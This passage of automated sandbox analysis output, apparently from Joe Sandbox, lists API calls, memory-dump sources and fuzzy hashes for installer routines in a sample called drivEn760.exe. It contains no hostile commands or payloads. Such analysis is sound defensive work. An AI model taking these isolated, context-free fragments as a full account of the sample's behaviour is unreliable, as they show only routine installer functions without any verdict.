                                                                                                            • Opcode Fuzzy Hash: bdc11d80229984bc477bed0571759e654de673e128be4c1f7cb28a7cce0576a7
                                                                                                            • Instruction Fuzzy Hash: 08D09E31108201AFDA115B10DD05A1A7FA5EB94355F12C42EF585540B0E77684719F0A
                                                                                                            APIs
                                                                                                              • Part of subcall function 004066A5: lstrcatW.KERNEL32(Delete on reboot: ,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                                                                              • Part of subcall function 004066A5: lstrlenW.KERNEL32(Delete on reboot: ,00000000,Delete on reboot: C:\Users\user\AppData\Local\Temp\nss476A.tmp\,?,00405701,Delete on reboot: C:\Users\user\AppData\Local\Temp\nss476A.tmp\,00000000), ref: 004068A4
                                                                                                            • SetDlgItemTextW.USER32(?,?,00000000), ref: 004045DE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2315048788.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2314152649.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2315981766.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000042B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000044A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2318734216.000000000044D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_drivEn760.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ItemTextlstrcatlstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 281422827-0
                                                                                                            • Opcode ID: 686190c6e4e1e5cc0914df72c0c951126eb576f2e70f28df627782bea9933419
                                                                                                            • Instruction ID: ac81fd1055ba0297197cac3df011722fda0f302089e5b839fe348bc6695a069d
                                                                                                            • Opcode Fuzzy Hash: 686190c6e4e1e5cc0914df72c0c951126eb576f2e70f28df627782bea9933419
                                                                                                            • Instruction Fuzzy Hash: 77C04C7554C300BFE641A755CC42F1FB799EF94319F04C92EB19DE11D1C63984309A2A
                                                                                                            APIs
                                                                                                            • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404622
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2315048788.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2314152649.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2315981766.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000042B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000044A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2318734216.000000000044D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_drivEn760.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 3850602802-0
                                                                                                            • Opcode ID: 8557fc69485774ba4641c6a2d2b4437b1a5152abf7221d5f63999a85994ee7b6
                                                                                                            • Instruction ID: 1d0f09303225af8c469e983b8f6ba21d59f3f36861eec243a4bc5be8392dea83
                                                                                                            • Opcode Fuzzy Hash: 8557fc69485774ba4641c6a2d2b4437b1a5152abf7221d5f63999a85994ee7b6
                                                                                                            • Instruction Fuzzy Hash: 9EC09B71741700FBDE209B509F45F077794A754701F154979B741F60E0D775D410D62D
                                                                                                            APIs
                                                                                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2315048788.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2314152649.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2315981766.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000042B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000044A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2318734216.000000000044D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_drivEn760.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FilePointer
                                                                                                            • String ID:
                                                                                                            • API String ID: 973152223-0
                                                                                                            • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                                                            • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                                                                                            • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                                                            • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                                                                                            APIs
                                                                                                            • SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2315048788.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2314152649.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2315981766.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000042B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000044A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2318734216.000000000044D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_drivEn760.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 3850602802-0
                                                                                                            • Opcode ID: 70666cfd2db8a5712e0e3ed728d50a5e19955e25533eceda6abdc0f56bdf790a
                                                                                                            • Instruction ID: 26063d6d883ff380d2e1d7f9fe2b9d631bf033e6200e0a233fd0d302f8c02db7
                                                                                                            • Opcode Fuzzy Hash: 70666cfd2db8a5712e0e3ed728d50a5e19955e25533eceda6abdc0f56bdf790a
                                                                                                            • Instruction Fuzzy Hash: 5BB01235286A00FBDE614B00DE09F457E62F764B01F048078F741240F0CAB300B5DF19
                                                                                                            APIs
                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,004043BD), ref: 004045F0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2315048788.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2314152649.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2315981766.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000042B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000044A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2318734216.000000000044D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_drivEn760.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CallbackDispatcherUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 2492992576-0
                                                                                                            • Opcode ID: b9cabee76f1705efe6df0b682491f715d60f75bd340f366a7093c5de42737780
                                                                                                            • Instruction ID: 97f05af551d2e904d84950d91e3a9b28448307360fbef328a82585e9573e9e03
                                                                                                            • Opcode Fuzzy Hash: b9cabee76f1705efe6df0b682491f715d60f75bd340f366a7093c5de42737780
                                                                                                            • Instruction Fuzzy Hash: DBA001B6604500ABDE129F61EF09D0ABB72EBA4B02B418579A28590034CA365961FB1D
                                                                                                            APIs
                                                                                                              • Part of subcall function 004056CA: lstrlenW.KERNEL32(Delete on reboot: C:\Users\user\AppData\Local\Temp\nss476A.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                                                                              • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,Delete on reboot: C:\Users\user\AppData\Local\Temp\nss476A.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                                                                              • Part of subcall function 004056CA: lstrcatW.KERNEL32(Delete on reboot: C:\Users\user\AppData\Local\Temp\nss476A.tmp\,004030A8,004030A8,Delete on reboot: C:\Users\user\AppData\Local\Temp\nss476A.tmp\,00000000,00000000,00000000), ref: 00405725
                                                                                                              • Part of subcall function 004056CA: SetWindowTextW.USER32(Delete on reboot: C:\Users\user\AppData\Local\Temp\nss476A.tmp\,Delete on reboot: C:\Users\user\AppData\Local\Temp\nss476A.tmp\), ref: 00405737
                                                                                                              • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                                                                              • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                                                                              • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                                                                              • Part of subcall function 00405C4B: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426750,00000000,00000000), ref: 00405C74
                                                                                                              • Part of subcall function 00405C4B: CloseHandle.KERNEL32(?), ref: 00405C81
                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FEB
                                                                                                              • Part of subcall function 00406AE0: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406AF1
                                                                                                              • Part of subcall function 00406AE0: GetExitCodeProcess.KERNELBASE(?,?), ref: 00406B13
                                                                                                              • Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2315048788.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2314152649.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2315981766.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000042B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000044A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2318734216.000000000044D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_drivEn760.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                                                            • String ID:
                                                                                                            • API String ID: 2972824698-0
                                                                                                            • Opcode ID: 2dc917c14671d7cce9cfacbaa9d8cb1b7381367e72f8379b939f4679accb4aeb
                                                                                                            • Instruction ID: 7fe263eab699b123ac8c37dffe14ee58438593542e676086741668bd6549bbba
                                                                                                            • Opcode Fuzzy Hash: 2dc917c14671d7cce9cfacbaa9d8cb1b7381367e72f8379b939f4679accb4aeb
                                                                                                            • Instruction Fuzzy Hash: 3DF09072905112EBDF21BBA59AC4DAE76A4DF01318B25453BE102B21E0D77C4E528A6E
                                                                                                            APIs
                                                                                                            • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229
                                                                                                            Strings
                                                                                                            • C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything, xrefs: 00402269
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2315048788.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2314152649.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2315981766.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000042B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000044A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2318734216.000000000044D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_drivEn760.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateInstance
                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything
                                                                                                            • API String ID: 542301482-2643781576
                                                                                                            • Opcode ID: 4e8b9e8d9efc1323b126c51a2f9450484e7b2217165b473e9f4f1a567a0bf10e
                                                                                                            • Instruction ID: f110e38d5ccd8909b9e85e2ea6b1342c5fae2602ce40754bea02e3b472428d32
                                                                                                            • Opcode Fuzzy Hash: 4e8b9e8d9efc1323b126c51a2f9450484e7b2217165b473e9f4f1a567a0bf10e
                                                                                                            • Instruction Fuzzy Hash: BC411771A00209EFCF40DFE4C989E9D7BB5BF49304B20456AF505EB2D1DB799981CB94
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,000003F9), ref: 00405049
                                                                                                            • GetDlgItem.USER32(?,00000408), ref: 00405054
                                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 0040509E
                                                                                                            • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 004050B5
                                                                                                            • SetWindowLongW.USER32(?,000000FC,0040563E), ref: 004050CE
                                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004050E2
                                                                                                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004050F4
                                                                                                            • SendMessageW.USER32(?,00001109,00000002), ref: 0040510A
                                                                                                            • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405116
                                                                                                            • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405128
                                                                                                            • DeleteObject.GDI32(00000000), ref: 0040512B
                                                                                                            • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405156
                                                                                                            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405162
                                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 004051FD
                                                                                                            • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040522D
                                                                                                              • Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405241
                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0040526F
                                                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040527D
                                                                                                            • ShowWindow.USER32(?,00000005), ref: 0040528D
                                                                                                            • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405388
                                                                                                            • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004053ED
                                                                                                            • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405402
                                                                                                            • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405426
                                                                                                            • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405446
                                                                                                            • ImageList_Destroy.COMCTL32(?), ref: 0040545B
                                                                                                            • GlobalFree.KERNEL32(?), ref: 0040546B
                                                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004054E4
                                                                                                            • SendMessageW.USER32(?,00001102,?,?), ref: 0040558D
                                                                                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040559C
                                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 004055C7
                                                                                                            • ShowWindow.USER32(?,00000000), ref: 00405615
                                                                                                            • GetDlgItem.USER32(?,000003FE), ref: 00405620
                                                                                                            • ShowWindow.USER32(00000000), ref: 00405627
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2315048788.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2314152649.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2315981766.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000042B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000044A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2318734216.000000000044D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_drivEn760.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                            • String ID: $M$N
                                                                                                            • API String ID: 2564846305-813528018
                                                                                                            • Opcode ID: 65f364cc419e4f6509e273f8c6de49045313dc9a9457de29721d4364d1471109
                                                                                                            • Instruction ID: a1eb65f7683e17450fca8d4cb4c1055b074660be5b1b810df034ff690b7f681c
                                                                                                            • Opcode Fuzzy Hash: 65f364cc419e4f6509e273f8c6de49045313dc9a9457de29721d4364d1471109
                                                                                                            • Instruction Fuzzy Hash: 2A025CB0900609EFDF20DF65CD45AAE7BB5FB44315F10817AEA10BA2E1D7798A52CF18
                                                                                                            APIs
                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406449,?,?), ref: 004062E9
                                                                                                            • GetShortPathNameW.KERNEL32(?,00426DE8,00000400), ref: 004062F2
                                                                                                              • Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
                                                                                                              • Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF
                                                                                                            • GetShortPathNameW.KERNEL32(?,004275E8,00000400), ref: 0040630F
                                                                                                            • wsprintfA.USER32 ref: 0040632D
                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,004275E8,C0000000,00000004,004275E8,?,?,?,?,?), ref: 00406368
                                                                                                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406377
                                                                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063AF
                                                                                                            • SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,004269E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 00406405
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00406416
                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040641D
                                                                                                              • Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\AppData\Local\Temp\drivEn760.exe,80000000,00000003), ref: 0040615C
                                                                                                              • Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2315048788.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2314152649.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2315981766.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000042B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000044A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2318734216.000000000044D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_drivEn760.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                            • String ID: %ls=%ls$[Rename]$mB$uB$uB
                                                                                                            • API String ID: 2171350718-2295842750
                                                                                                            • Opcode ID: 1c644fdb5bf5358e971e1e57754d6873d4af67f600c8cbf5706e979a92214bad
                                                                                                            • Instruction ID: df9b4e9fb9d32bd4c250032a1d399944af7a2e4c2f0bdec2b7d3959d12e60cc8
                                                                                                            • Opcode Fuzzy Hash: 1c644fdb5bf5358e971e1e57754d6873d4af67f600c8cbf5706e979a92214bad
                                                                                                            • Instruction Fuzzy Hash: B8314331200315BBD2206B619D49F5B3AACEF85704F16003BFD02FA2C2EA7DD82186BD
                                                                                                            APIs
                                                                                                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
